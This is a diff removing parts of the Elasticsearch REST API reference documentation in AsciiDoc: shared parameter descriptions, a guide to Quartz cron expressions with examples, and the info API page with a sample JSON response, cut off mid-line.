-`detailed`:: -(Optional, Boolean) -If `true`, -the response includes detailed information about shard recoveries. -Defaults to `false`. -end::detailed[] - -tag::df[] -`df`:: -(Optional, string) Field to use as default where no field prefix is -given in the query string. -end::df[] - -tag::docs-count[] -The number of documents as reported by Lucene. This excludes deleted documents -and counts any <> separately from their parents. It -also excludes documents which were indexed recently and do not yet belong to a -segment. -end::docs-count[] - -tag::docs-deleted[] -The number of deleted documents as reported by Lucene, which may be higher or -lower than the number of delete operations you have performed. This number -excludes deletes that were performed recently and do not yet belong to a -segment. Deleted documents are cleaned up by the -<> if it makes sense to do so. -Also, {es} creates extra deleted documents to internally track the recent -history of operations on a shard. -end::docs-deleted[] - -tag::docs-indexed[] -The number of documents that have been indexed into the destination index -for the {transform}. -end::docs-indexed[] - -tag::docs-processed[] -The number of documents that have been processed from the source index of -the {transform}. -end::docs-processed[] - -tag::enrich-policy[] -Enrich policy name -used to limit the request. -end::enrich-policy[] - -tag::expand-wildcards[] -`expand_wildcards`:: -+ --- -(Optional, string) Controls what kind of indices that wildcard expressions can -expand to. Multiple values are accepted when separated by a comma, as in -`open,hidden`. Valid values are: - -`all`:: -Expand to open and closed indices, including <>. - -`open`:: -Expand only to open indices. - -`closed`:: -Expand only to closed indices. - -`hidden`:: -Expansion of wildcards will include hidden indices. -Must be combined with `open`, `closed`, or both. - -`none`:: -Wildcard expressions are not accepted. --- -end::expand-wildcards[] - -tag::exponential-avg-checkpoint-duration-ms[] -Exponential moving average of the duration of the checkpoint, in milliseconds. -end::exponential-avg-checkpoint-duration-ms[] - -tag::exponential-avg-documents-indexed[] -Exponential moving average of the number of new documents that have been -indexed. -end::exponential-avg-documents-indexed[] - -tag::exponential-avg-documents-processed[] -Exponential moving average of the number of documents that have been -processed. -end::exponential-avg-documents-processed[] - -tag::field_statistics[] -`field_statistics`:: -(Optional, Boolean) If `true`, the response includes the document count, sum of document frequencies, -and sum of total term frequencies. -Defaults to `true`. -end::field_statistics[] - -tag::fielddata-fields[] -`fielddata_fields`:: -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in `fielddata` statistics. -end::fielddata-fields[] - -tag::fields[] -`fields`:: -+ --- -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in the statistics. - -Used as the default list -unless a specific field list is provided -in the `completion_fields` or `fielddata_fields` parameters. --- -end::fields[] - -tag::index-alias-filter[] -<> -used to limit the index alias. -+ -If specified, -the index alias only applies to documents returned by the filter. -end::index-alias-filter[] - -tag::flat-settings[] -`flat_settings`:: -(Optional, Boolean) If `true`, returns settings in flat format. Defaults to -`false`. -end::flat-settings[] - -tag::generation[] -Generation number, such as `0`. {es} increments this generation number -for each segment written. {es} then uses this number to derive the segment name. -end::generation[] - -tag::http-format[] -`format`:: -(Optional, string) Short version of the -https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html[HTTP accept header]. -Valid values include JSON, YAML, etc. -end::http-format[] - -tag::frequency[] -The interval between checks for changes in the source indices when the -{transform} is running continuously. Also determines the retry interval in the -event of transient failures while the {transform} is searching or indexing. The -minimum value is `1s` and the maximum is `1h`. The default value is `1m`. -end::frequency[] - -tag::from[] -`from`:: -(Optional, integer) Starting document offset. Defaults to `0`. -end::from[] - -tag::from-transforms[] -Skips the specified number of {transforms}. The default value is `0`. -end::from-transforms[] - -tag::generation[] -Generation number, such as `0`. {es} increments this generation number -for each segment written. {es} then uses this number to derive the segment name. -end::generation[] - -tag::group-by[] -`group_by`:: -+ --- -(Optional, string) -Key used to group tasks in the response. - -Possible values are: - -`nodes`:: -(Default) -Node ID - -`parents`:: -Parent task ID - -`none`:: -Do not group tasks. --- -end::group-by[] - -tag::groups[] -`groups`:: -(Optional, string) -Comma-separated list of search groups -to include in the `search` statistics. -end::groups[] - -tag::cat-h[] -`h`:: -(Optional, string) Comma-separated list of column names to display. -end::cat-h[] - -tag::help[] -`help`:: -(Optional, Boolean) If `true`, the response includes help information. Defaults -to `false`. -end::help[] - -tag::bulk-id[] -`_id`:: -(Optional, string) -The document ID. -If no ID is specified, a document ID is automatically generated. -end::bulk-id[] - -tag::if_primary_term[] -`if_primary_term`:: -(Optional, integer) Only perform the operation if the document has -this primary term. See <>. -end::if_primary_term[] - -tag::if_seq_no[] -`if_seq_no`:: -(Optional, integer) Only perform the operation if the document has this -sequence number. See <>. -end::if_seq_no[] - -tag::ignore_throttled[] -`ignore_throttled`:: -(Optional, Boolean) If `true`, concrete, expanded or aliased indices are -ignored when frozen. Defaults to `true`. -end::ignore_throttled[] - -tag::index-ignore-unavailable[] -`ignore_unavailable`:: -(Optional, Boolean) If `true`, missing or closed indices are not included in the -response. Defaults to `false`. -end::index-ignore-unavailable[] - -tag::include-defaults[] -`include_defaults`:: -(Optional, string) If `true`, return all default settings in the response. -Defaults to `false`. -end::include-defaults[] - -tag::include-segment-file-sizes[] -`include_segment_file_sizes`:: -(Optional, Boolean) -If `true`, the call reports the aggregated disk usage of -each one of the Lucene index files (only applies if segment stats are -requested). Defaults to `false`. -end::include-segment-file-sizes[] - -tag::include-type-name[] -`include_type_name`:: -deprecated:[7.0.0, Mapping types have been deprecated. See <>.] -(Optional, boolean) If `true`, a mapping type is expected in the body of -mappings. Defaults to `false`. -end::include-type-name[] - -tag::include-unloaded-segments[] -`include_unloaded_segments`:: -(Optional, Boolean) If `true`, the response includes information from segments -that are **not** loaded into memory. Defaults to `false`. -end::include-unloaded-segments[] - -tag::index-query-parm[] -`index`:: -(Optional, string) -Comma-separated list or wildcard expression of index names -used to limit the request. -end::index-query-parm[] - -tag::index[] -``:: -(Optional, string) Comma-separated list or wildcard expression of index names -used to limit the request. -end::index[] - -tag::index-failures[] -The number of indexing failures. -end::index-failures[] - -tag::index-time-ms[] -The amount of time spent indexing, in milliseconds. -end::index-time-ms[] - -tag::index-total[] -The number of indices created. -end::index-total[] - -tag::bulk-index[] -`_index`:: -(Optional, string) -Name of the data stream, index, or index alias to perform the action on. This -parameter is required if a `` is not specified in the request path. -end::bulk-index[] - -tag::index-metric[] -``:: -+ --- -(Optional, string) -Comma-separated list of metrics used to limit the request. -Supported metrics are: - -`_all`:: -Return all statistics. - -`completion`:: -<> statistics. - -`docs`:: -Number of documents and deleted docs, which have not yet merged out. -<> can affect this statistic. - -`fielddata`:: -<> statistics. - -`flush`:: -<> statistics. - -`get`:: -Get statistics, -including missing stats. - -`indexing`:: -<> statistics. - -`merge`:: -<> statistics. - -`query_cache`:: -<> statistics. - -`refresh`:: -<> statistics. - -`request_cache`:: -<> statistics. - -`search`:: -Search statistics including suggest statistics. -You can include statistics for custom groups -by adding an extra `groups` parameter -(search operations can be associated with one or more groups). -The `groups` parameter accepts a comma separated list of group names. -Use `_all` to return statistics for all groups. - -`segments`:: -Memory use of all open segments. -+ -If the `include_segment_file_sizes` parameter is `true`, -this metric includes the aggregated disk usage -of each Lucene index file. - -`store`:: -Size of the index in <>. - -`suggest`:: -<> statistics. - -`translog`:: -<> statistics. - -`warmer`:: -<> statistics. --- -end::index-metric[] - -tag::index-template[] -``:: -(Required, string) -Comma-separated list of index template names used to limit the request. Wildcard -(`*`) expressions are supported. -end::index-template[] - -tag::component-template[] -``:: -(Required, string) -Comma-separated list or wildcard expression of component template names -used to limit the request. -end::component-template[] - -tag::lenient[] -`lenient`:: -(Optional, Boolean) If `true`, format-based query failures (such as -providing text to a numeric field) will be ignored. Defaults to `false`. -end::lenient[] - -tag::level[] -`level`:: -+ --- -(Optional, string) -Indicates whether statistics are aggregated -at the cluster, index, or shard level. - -Valid values are: - -* `cluster` -* `indices` -* `shards` --- -end::level[] - -tag::local[] -`local`:: -(Optional, Boolean) If `true`, the request retrieves information from the local -node only. Defaults to `false`, which means information is retrieved from -the master node. -end::local[] - -tag::mappings[] -`mappings`:: -+ --- -(Optional, <>) Mapping for fields in the index. If -specified, this mapping can include: - -* Field names -* <> -* <> - -See <>. --- -end::mappings[] - -tag::max_docs[] -`max_docs`:: -(Optional, integer) Maximum number of documents to process. Defaults to all -documents. -end::max_docs[] - -tag::memory[] -Bytes of segment data stored in memory for efficient search, -such as `1264`. -+ -A value of `-1` indicates {es} was unable to compute this number. -end::memory[] - -tag::bulk-require-alias[] -`require_alias`:: -(Optional, Boolean) -If `true`, the action must target an <>. Defaults -to `false`. -end::bulk-require-alias[] - -tag::require-alias[] -`require_alias`:: -(Optional, Boolean) -If `true`, the destination must be an <>. Defaults to -`false`. -end::require-alias[] - -tag::node-filter[] -``:: -(Optional, string) -Comma-separated list of <> used to limit returned -information. Defaults to all nodes in the cluster. -end::node-filter[] - -tag::node-id[] -``:: -(Optional, string) Comma-separated list of node IDs or names used to limit -returned information. -end::node-id[] - -tag::node-id-query-parm[] -`node_id`:: -(Optional, string) -Comma-separated list of node IDs or names -used to limit returned information. -end::node-id-query-parm[] - -tag::offsets[] -``:: -(Optional, Boolean) If `true`, the response includes term offsets. -Defaults to `true`. -end::offsets[] - -tag::parent-task-id[] -`parent_task_id`:: -+ --- -(Optional, string) -Parent task ID -used to limit returned information. - -To return all tasks, -omit this parameter -or use a value of `-1`. --- -end::parent-task-id[] - -tag::payloads[] -`payloads`:: -(Optional, Boolean) If `true`, the response includes term payloads. -Defaults to `true`. -end::payloads[] - -tag::pipeline[] -`pipeline`:: -(Optional, string) ID of the pipeline to use to preprocess incoming documents. -end::pipeline[] - -tag::pages-processed[] -The number of search or bulk index operations processed. Documents are -processed in batches instead of individually. -end::pages-processed[] - -tag::pivot[] -The method for transforming the data. These objects define the pivot function -`group by` fields and the aggregation to reduce the data. -end::pivot[] - -tag::pivot-aggs[] -Defines how to aggregate the grouped data. The following aggregations are -currently supported: -+ --- -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- -end::pivot-aggs[] - -tag::pivot-group-by[] -Defines how to group the data. More than one grouping can be defined per pivot. -The following groupings are currently supported: -+ --- -* <<_date_histogram,Date histogram>> -* <<_geotile_grid,Geotile Grid>> -* <<_histogram,Histogram>> -* <<_terms,Terms>> - --- -end::pivot-group-by[] - -tag::positions[] -`positions`:: -(Optional, Boolean) If `true`, the response includes term positions. -Defaults to `true`. -end::positions[] - -tag::preference[] -`preference`:: -(Optional, string) Specifies the node or shard the operation should be -performed on. Random by default. -end::preference[] - -tag::processing-time-ms[] -The amount of time spent processing results, in milliseconds. -end::processing-time-ms[] - -tag::processing-total[] -The number of processing operations. -end::processing-total[] - -tag::search-q[] -`q`:: -(Optional, string) Query in the Lucene query string syntax. -end::search-q[] - -tag::query[] -`query`:: -(Optional, <>) Defines the search definition using the -<>. -end::query[] - -tag::realtime[] -`realtime`:: -(Optional, Boolean) If `true`, the request is real-time as opposed to near-real-time. -Defaults to `true`. See <>. -end::realtime[] - -tag::refresh[] -`refresh`:: -(Optional, enum) If `true`, {es} refreshes the affected shards to make this -operation visible to search, if `wait_for` then wait for a refresh to make -this operation visible to search, if `false` do nothing with refreshes. -Valid values: `true`, `false`, `wait_for`. Default: `false`. -end::refresh[] - -tag::request_cache[] -`request_cache`:: -(Optional, Boolean) If `true`, the request cache is used for this request. -Defaults to the index-level setting. -end::request_cache[] - -tag::requests_per_second[] -`requests_per_second`:: -(Optional, integer) The throttle for this request in sub-requests per second. -Defaults to `-1` (no throttle). -end::requests_per_second[] - -tag::routing[] -`routing`:: -(Optional, string) Target the specified primary shard. -end::routing[] - -tag::index-routing[] -`routing`:: -(Optional, string) -Custom <> -used to route operations to a specific shard. -end::index-routing[] - -tag::cat-s[] -`s`:: -(Optional, string) Comma-separated list of column names or column aliases used -to sort the response. -end::cat-s[] - -tag::scroll[] -`scroll`:: -(Optional, <>) Specifies how long a consistent view of -the index should be maintained for scrolled search. -end::scroll[] - -tag::scroll_size[] -`scroll_size`:: -(Optional, integer) Size of the scroll request that powers the operation. -Defaults to 1000. -end::scroll_size[] - -tag::search-failures[] -The number of search failures. -end::search-failures[] - -tag::search-time-ms[] -The amount of time spent searching, in milliseconds. -end::search-time-ms[] - -tag::search-total[] -The number of search operations on the source index for the {transform}. -end::search-total[] - -tag::search_type[] -`search_type`:: -(Optional, string) The type of the search operation. Available options: -* `query_then_fetch` -* `dfs_query_then_fetch` -end::search_type[] - -tag::segment[] -Name of the segment, such as `_0`. The segment name is derived from -the segment generation and used internally to create file names in the directory -of the shard. -end::segment[] - -tag::segment-search[] -If `true`, -the segment is searchable. -+ -If `false`, -the segment has most likely been written to disk -but needs a <> to be searchable. -end::segment-search[] - -tag::segment-size[] -Disk space used by the segment, such as `50kb`. -end::segment-size[] - -tag::settings[] -`settings`:: -(Optional, <>) Configuration -options for the index. See <>. -end::settings[] - -tag::target-index-settings[] -`settings`:: -(Optional, <>) -Configuration options for the target index. -See <>. -end::target-index-settings[] - -tag::size-transforms[] -Specifies the maximum number of {transforms} to obtain. The default value is -`100`. -end::size-transforms[] - -tag::slices[] -`slices`:: -(Optional, integer) The number of slices this task should be divided into. -Defaults to 1 meaning the task isn't sliced into subtasks. -end::slices[] - -tag::sort[] -`sort`:: -(Optional, string) A comma-separated list of : pairs. -end::sort[] - -tag::source[] -`_source`:: -(Optional, string) True or false to return the `_source` field or not, or a -list of fields to return. -end::source[] - -tag::source_excludes[] -`_source_excludes`:: -(Optional, string) -A comma-separated list of <> to exclude from -the response. -+ -You can also use this parameter to exclude fields from the subset specified in -`_source_includes` query parameter. -+ -If the `_source` parameter is `false`, this parameter is ignored. -end::source_excludes[] - -tag::source_includes[] -`_source_includes`:: -(Optional, string) -A comma-separated list of <> to -include in the response. -+ -If this parameter is specified, only these source fields are returned. You can -exclude fields from this subset using the `_source_excludes` query parameter. -+ -If the `_source` parameter is `false`, this parameter is ignored. -end::source_includes[] - -tag::source-transforms[] -The source of the data for the {transform}. -end::source-transforms[] - -tag::source-index-transforms[] -The _source indices_ for the {transform}. It can be a single index, an index -pattern (for example, `"my-index-*"`), an array of indices (for example, -`["my-index-000001", "my-index-000002"]`), or an array of index patterns (for example, -`["my-index-*", "my-other-index-*"]`. -end::source-index-transforms[] - -tag::source-query-transforms[] -A query clause that retrieves a subset of data from the source index. See -<>. -end::source-query-transforms[] - -tag::state-transform[] -The status of the {transform}, which can be one of the following values: -+ --- -* `aborting`: The {transform} is aborting. -* `failed`: The {transform} failed. For more information about the failure, -check the reason field. -* `indexing`: The {transform} is actively processing data and creating new -documents. -* `started`: The {transform} is running but not actively indexing data. -* `stopped`: The {transform} is stopped. -* `stopping`: The {transform} is stopping. --- -end::state-transform[] - -tag::state-transform-reason[] -If a {transform} has a `failed` state, this property provides details about the -reason for the failure. -end::state-transform-reason[] - -tag::stats[] -`stats`:: -(Optional, string) Specific `tag` of the request for logging and statistical -purposes. -end::stats[] - -tag::stored_fields[] -`stored_fields`:: -(Optional, Boolean) If `true`, retrieves the document fields stored in the -index rather than the document `_source`. Defaults to `false`. -end::stored_fields[] - -tag::sync[] -Defines the properties {transforms} require to run continuously. -end::sync[] - -tag::sync-time[] -Specifies that the {transform} uses a time field to synchronize the source and -destination indices. -end::sync-time[] - -tag::sync-time-field[] -The date field that is used to identify new documents in the source. -end::sync-time-field[] - -tag::sync-time-delay[] -The time delay between the current time and the latest input data time. The -default value is `60s`. -end::sync-time-delay[] - -tag::transform-settings[] -Defines optional {transform} settings. -end::transform-settings[] - -tag::transform-settings-docs-per-second[] -Specifies a limit on the number of input documents per second. This setting -throttles the {transform} by adding a wait time between search requests. The -default value is `null`, which disables throttling. -end::transform-settings-docs-per-second[] - -tag::transform-settings-max-page-search-size[] -Defines the initial page size to use for the composite aggregation for each -checkpoint. If circuit breaker exceptions occur, the page size is dynamically -adjusted to a lower value. The minimum value is `10` and the maximum is `10,000`. -The default value is `500`. -end::transform-settings-max-page-search-size[] - -tag::target-index[] -``:: -+ --- -(Required, string) -Name of the target index to create. - -include::{es-repo-dir}/indices/create-index.asciidoc[tag=index-name-reqs] --- -end::target-index[] - -tag::task-id[] -``:: -(Optional, string) ID of the task to return -(`node_id:task_number`). -end::task-id[] - -tag::term_statistics[] -`term_statistics`:: -(Optional, Boolean) If `true`, the response includes term frequency and document frequency. -Defaults to `false`. -end::term_statistics[] - -tag::terminate_after[] -`terminate_after`:: -(Optional, integer) The maximum number of documents to collect for each shard, -upon reaching which the query execution will terminate early. -end::terminate_after[] - -tag::time[] -`time`:: -(Optional, <>) -Unit used to display time values. -end::time[] - -tag::timeoutparms[] -tag::master-timeout[] -`master_timeout`:: -(Optional, <>) -Period to wait for a connection to the master node. If no response is received -before the timeout expires, the request fails and returns an error. Defaults to -`30s`. -end::master-timeout[] - -tag::timeout[] -`timeout`:: -(Optional, <>) -Period to wait for a response. If no response is received before the timeout -expires, the request fails and returns an error. Defaults to `30s`. -end::timeout[] -end::timeoutparms[] - -tag::type[] -``:: -(Optional, string) -Comma-separated list or wildcard expression of types -used to limit the request. -end::type[] - -tag::transform-id[] -Identifier for the {transform}. This identifier can contain lowercase -alphanumeric characters (a-z and 0-9), hyphens, and underscores. It must start -and end with alphanumeric characters. -end::transform-id[] - -tag::transform-id-wildcard[] -Identifier for the {transform}. It can be a {transform} identifier or a wildcard -expression. If you do not specify one of these options, the API returns -information for all {transforms}. -end::transform-id-wildcard[] - -tag::trigger-count[] -The number of times the {transform} has been triggered by the scheduler. For -example, the scheduler triggers the {transform} indexer to check for updates -or ingest new data at an interval specified in the -<>. -end::trigger-count[] - -tag::cat-v[] -`v`:: -(Optional, Boolean) If `true`, the response includes column headings. -Defaults to `false`. -end::cat-v[] - -tag::version[] -`version`:: -(Optional, Boolean) If `true`, returns the document version as part of a hit. -end::version[] - -tag::doc-version[] -`version`:: -(Optional, integer) Explicit version number for concurrency control. -The specified version must match the current version of the document for the -request to succeed. -end::doc-version[] - -tag::segment-version[] -Version of Lucene used to write the segment. -end::segment-version[] - -tag::version_type[] -`version_type`:: -(Optional, enum) Specific version type: `internal`, `external`, -`external_gte`. -end::version_type[] - -tag::wait_for_active_shards[] -`wait_for_active_shards`:: -+ --- -(Optional, string) The number of shard copies that must be active before -proceeding with the operation. Set to `all` or any positive integer up -to the total number of shards in the index (`number_of_replicas+1`). -Default: 1, the primary shard. - -See <>. --- -end::wait_for_active_shards[] diff --git a/docs/reference/rest-api/cron-expressions.asciidoc b/docs/reference/rest-api/cron-expressions.asciidoc deleted file mode 100644 index d817974e154..00000000000 --- a/docs/reference/rest-api/cron-expressions.asciidoc +++ /dev/null @@ -1,182 +0,0 @@ -[[cron-expressions]] -=== Cron expressions - -A cron expression is a string of the following form: - -[source,txt] ------------------------------- - [year] ------------------------------- - -{es} uses the cron parser from the https://quartz-scheduler.org[Quartz Job Scheduler]. -For more information about writing Quartz cron expressions, see the -http://www.quartz-scheduler.org/documentation/quartz-2.3.0/tutorials/crontrigger.html[Quartz CronTrigger Tutorial]. - -All schedule times are in coordinated universal time (UTC); other timezones are not supported. - -TIP: You can use the <> command line tool to validate your cron expressions. - - -[[cron-elements]] -==== Cron expression elements - -All elements are required except for `year`. -See <> for information about the allowed special characters. - -``:: -(Required) -Valid values: `0`-`59` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `0`-`59` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `0`-`23` and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `1`-`31` and the special characters `,` `-` `*` `/` `?` `L` `W` - -``:: -(Required) -Valid values: `1`-`12`, `JAN`-`DEC`, `jan`-`dec`, and the special characters `,` `-` `*` `/` - -``:: -(Required) -Valid values: `1`-`7`, `SUN`-`SAT`, `sun`-`sat`, and the special characters `,` `-` `*` `/` `?` `L` `#` - -``:: -(Optional) -Valid values: `1970`-`2099` and the special characters `,` `-` `*` `/` - -[[cron-special-characters]] -==== Cron special characters - -`*`:: -Selects every possible value for a field. For -example, `*` in the `hours` field means "every hour". - -`?`:: -No specific value. Use when you don't care what the value -is. For example, if you want the schedule to trigger on a -particular day of the month, but don't care what day of -the week that happens to be, you can specify `?` in the -`day_of_week` field. - -`-`:: -A range of values (inclusive). Use to separate a minimum -and maximum value. For example, if you want the schedule -to trigger every hour between 9:00 a.m. and 5:00 p.m., you -could specify `9-17` in the `hours` field. - -`,`:: -Multiple values. Use to separate multiple values for a -field. For example, if you want the schedule to trigger -every Tuesday and Thursday, you could specify `TUE,THU` -in the `day_of_week` field. - -`/`:: -Increment. Use to separate values when specifying a time -increment. The first value represents the starting point, -and the second value represents the interval. For example, -if you want the schedule to trigger every 20 minutes -starting at the top of the hour, you could specify `0/20` -in the `minutes` field. Similarly, specifying `1/5` in -`day_of_month` field will trigger every 5 days starting on -the first day of the month. - -`L`:: -Last. Use in the `day_of_month` field to mean the last day -of the month--day 31 for January, day 28 for February in -non-leap years, day 30 for April, and so on. Use alone in -the `day_of_week` field in place of `7` or `SAT`, or after -a particular day of the week to select the last day of that -type in the month. For example `6L` means the last Friday -of the month. You can specify `LW` in the `day_of_month` -field to specify the last weekday of the month. Avoid using -the `L` option when specifying lists or ranges of values, -as the results likely won't be what you expect. - -`W`:: -Weekday. Use to specify the weekday (Monday-Friday) nearest -the given day. As an example, if you specify `15W` in the -`day_of_month` field and the 15th is a Saturday, the -schedule will trigger on the 14th. If the 15th is a Sunday, -the schedule will trigger on Monday the 16th. If the 15th -is a Tuesday, the schedule will trigger on Tuesday the 15th. -However if you specify `1W` as the value for `day_of_month`, -and the 1st is a Saturday, the schedule will trigger on -Monday the 3rd--it won't jump over the month boundary. You -can specify `LW` in the `day_of_month` field to specify the -last weekday of the month. You can only use the `W` option -when the `day_of_month` is a single day--it is not valid -when specifying a range or list of days. - -`#`:: -Nth XXX day in a month. Use in the `day_of_week` field to -specify the nth XXX day of the month. For example, if you -specify `6#1`, the schedule will trigger on the first -Friday of the month. Note that if you specify `3#5` and -there are not 5 Tuesdays in a particular month, the -schedule won't trigger that month. - -[[cron-expression-examples]] -==== Examples - -[[cron-example-daily]] -===== Setting daily triggers - -`0 5 9 * * ?`:: -Trigger at 9:05 a.m. UTC every day. - -`0 5 9 * * ? 2020`:: -Trigger at 9:05 a.m. UTC every day during the year 2020. - -[[cron-example-range]] -===== Restricting triggers to a range of days or times - -`0 5 9 ? * MON-FRI`:: -Trigger at 9:05 a.m. UTC Monday through Friday. - -`0 0-5 9 * * ?`:: -Trigger every minute starting at 9:00 a.m. UTC and ending at 9:05 a.m. UTC every day. - -[[cron-example-interval]] -===== Setting interval triggers - -`0 0/15 9 * * ?`:: -Trigger every 15 minutes starting at 9:00 a.m. UTC and ending at 9:45 a.m. UTC every day. - -`0 5 9 1/3 * ?`:: -Trigger at 9:05 a.m. UTC every 3 days every month, starting on the first day of the month. - -[[cron-example-day]] -===== Setting schedules that trigger on a particular day - -`0 1 4 1 4 ?`:: -Trigger every April 1st at 4:01 a.m. UTC. -`0 0,30 9 ? 4 WED`:: -Trigger at 9:00 a.m. UTC and at 9:30 a.m. UTC every Wednesday in the month of April. - -`0 5 9 15 * ?`:: -Trigger at 9:05 a.m. UTC on the 15th day of every month. - -`0 5 9 15W * ?`:: -Trigger at 9:05 a.m. UTC on the nearest weekday to the 15th of every month. - -`0 5 9 ? * 6#1`:: -Trigger at 9:05 a.m. UTC on the first Friday of every month. - -[[cron-example-last]] -===== Setting triggers using last - -`0 5 9 L * ?`:: -Trigger at 9:05 a.m. UTC on the last day of every month. - -`0 5 9 ? * 2L`:: -Trigger at 9:05 a.m. UTC on the last Monday of every month. - -`0 5 9 LW * ?`:: -Trigger at 9:05 a.m. UTC on the last weekday of every month. diff --git a/docs/reference/rest-api/defs.asciidoc b/docs/reference/rest-api/defs.asciidoc deleted file mode 100644 index 405d738712e..00000000000 --- a/docs/reference/rest-api/defs.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[role="xpack"] -[[api-definitions]] -== Definitions - -The role mappings resource definition you can find below is used in APIs related -to {security-features}. - -* <> - - -include::{xes-repo-dir}/rest-api/security/role-mapping-resources.asciidoc[] diff --git a/docs/reference/rest-api/index.asciidoc b/docs/reference/rest-api/index.asciidoc deleted file mode 100644 index 0e0f2218fd0..00000000000 --- a/docs/reference/rest-api/index.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[[rest-apis]] -= REST APIs - -[partintro] --- -{es} exposes REST APIs that are used by the UI components and can be called -directly to configure and access {es} features. - -[NOTE] -We are working on including more {es} APIs in this section. Some content might -not be included yet. - -* <> -ifdef::permanently-unreleased-branch[] -* <> -endif::[] -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> --- - -include::{es-repo-dir}/api-conventions.asciidoc[] -ifdef::permanently-unreleased-branch[] -include::{es-repo-dir}/autoscaling/apis/autoscaling-apis.asciidoc[] -endif::[] -include::{es-repo-dir}/cat.asciidoc[] -include::{es-repo-dir}/cluster.asciidoc[] -include::{es-repo-dir}/ccr/apis/ccr-apis.asciidoc[] -include::{es-repo-dir}/data-streams/data-stream-apis.asciidoc[] -include::{es-repo-dir}/docs.asciidoc[] -include::{es-repo-dir}/ingest/apis/enrich/index.asciidoc[] -include::{es-repo-dir}/graph/explore.asciidoc[] -include::{es-repo-dir}/indices.asciidoc[] -include::{es-repo-dir}/ilm/apis/ilm-api.asciidoc[] -include::{es-repo-dir}/ingest/apis/index.asciidoc[] -include::info.asciidoc[] -include::{es-repo-dir}/licensing/index.asciidoc[] -include::{es-repo-dir}/ml/anomaly-detection/apis/index.asciidoc[] -include::{es-repo-dir}/ml/df-analytics/apis/index.asciidoc[] -include::{es-repo-dir}/migration/migration.asciidoc[] -include::{es-repo-dir}/indices/apis/reload-analyzers.asciidoc[] -include::{es-repo-dir}/repositories-metering-api/repositories-metering-apis.asciidoc[] -include::{es-repo-dir}/rollup/rollup-api.asciidoc[] -include::{es-repo-dir}/search.asciidoc[] -include::{es-repo-dir}/searchable-snapshots/apis/searchable-snapshots-apis.asciidoc[] -include::{xes-repo-dir}/rest-api/security.asciidoc[] -include::{es-repo-dir}/snapshot-restore/apis/snapshot-restore-apis.asciidoc[] -include::{es-repo-dir}/slm/apis/slm-api.asciidoc[] -include::{es-repo-dir}/transform/apis/index.asciidoc[] -include::usage.asciidoc[] -include::{xes-repo-dir}/rest-api/watcher.asciidoc[] -include::defs.asciidoc[] diff --git a/docs/reference/rest-api/info.asciidoc b/docs/reference/rest-api/info.asciidoc deleted file mode 100644 index 50c87fe99e1..00000000000 --- a/docs/reference/rest-api/info.asciidoc +++ /dev/null @@ -1,188 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[info-api]] -== Info API - -Provides general information about the installed {xpack} features. - -[discrete] -[[info-api-request]] -=== {api-request-title} - -`GET /_xpack` - -[discrete] -[[info-api-desc]] -=== {api-description-title} - -The information provided by this API includes: - -* Build Information - including the build number and timestamp. -* License Information - basic information about the currently installed license. -* Features Information - The features that are currently enabled and available - under the current license. - -[discrete] -[[info-api-path-params]] -=== {api-path-parms-title} - -`categories`:: - (Optional, list) A comma-separated list of the information categories to - include in the response. For example, `build,license,features`. - -`human`:: - (Optional, Boolean) Defines whether additional human-readable information is - included in the response. In particular, it adds descriptions and a tag line. - The default value is `true`. - -[discrete] -[[info-api-example]] -=== {api-examples-title} - -The following example queries the info API: - -[source,console] ------------------------------------------------------------- -GET /_xpack ------------------------------------------------------------- - -Example response: - -[source,console-result] ------------------------------------------------------------- -{ - "build" : { - "hash" : "2798b1a3ce779b3611bb53a0082d4d741e4d3168", - "date" : "2015-04-07T13:34:42Z" - }, - "license" : { - "uid" : "893361dc-9749-4997-93cb-xxx", - "type" : "trial", - "mode" : "trial", - "status" : "active", - "expiry_date_in_millis" : 1542665112332 - }, - "features" : { - "ccr" : { - "available" : true, - "enabled" : true - }, - "analytics" : { - "available" : true, - "enabled" : true - }, - "enrich" : { - "available" : true, - "enabled" : true - }, - "flattened" : { - "available" : true, - "enabled" : true - }, - "frozen_indices" : { - "available" : true, - "enabled" : true - }, - "graph" : { - "available" : true, - "enabled" : true - }, - "ilm" : { - "available" : true, - "enabled" : true - }, - "logstash" : { - "available" : true, - "enabled" : true - }, - "ml" : { - "available" : true, - "enabled" : true, - "native_code_info" : { - "version" : "7.0.0-alpha1-SNAPSHOT", - "build_hash" : "99a07c016d5a73" - } - }, - "monitoring" : { - "available" : true, - "enabled" : true - }, - "rollup": { - "available": true, - "enabled": true - }, - "searchable_snapshots" : { - "available" : true, - "enabled" : true - }, - "security" : { - "available" : true, - "enabled" : false - }, - "slm" : { - "available" : true, - "enabled" : true - }, - "spatial" : { - "available" : true, - "enabled" : true - }, - "eql" : { - "available" : true, - "enabled" : true - }, - "sql" : { - "available" : true, - "enabled" : true - }, - "transform" : { - "available" : true, - "enabled" : true - }, - "vectors" : { - "available" : true, - "enabled" : true - }, - "voting_only" : { - "available" : true, - "enabled" : true - }, - "watcher" : { - "available" : true, - "enabled" : true - }, - "data_streams" : { - "available" : true, - "enabled" : true, - }, - "data_tiers" : { - "available" : true, - "enabled" : true, - } - }, - "tagline" : "You know, for X" -} ------------------------------------------------------------- -// TESTRESPONSE[s/"hash" : "2798b1a3ce779b3611bb53a0082d4d741e4d3168",/"hash" : "$body.build.hash",/] -// TESTRESPONSE[s/"date" : "2015-04-07T13:34:42Z"/"date" : "$body.build.date"/] -// TESTRESPONSE[s/"uid" : "893361dc-9749-4997-93cb-xxx",/"uid": "$body.license.uid",/] -// TESTRESPONSE[s/"expiry_date_in_millis" : 1542665112332/"expiry_date_in_millis" : "$body.license.expiry_date_in_millis"/] -// TESTRESPONSE[s/"version" : "7.0.0-alpha1-SNAPSHOT",/"version": "$body.features.ml.native_code_info.version",/] -// TESTRESPONSE[s/"build_hash" : 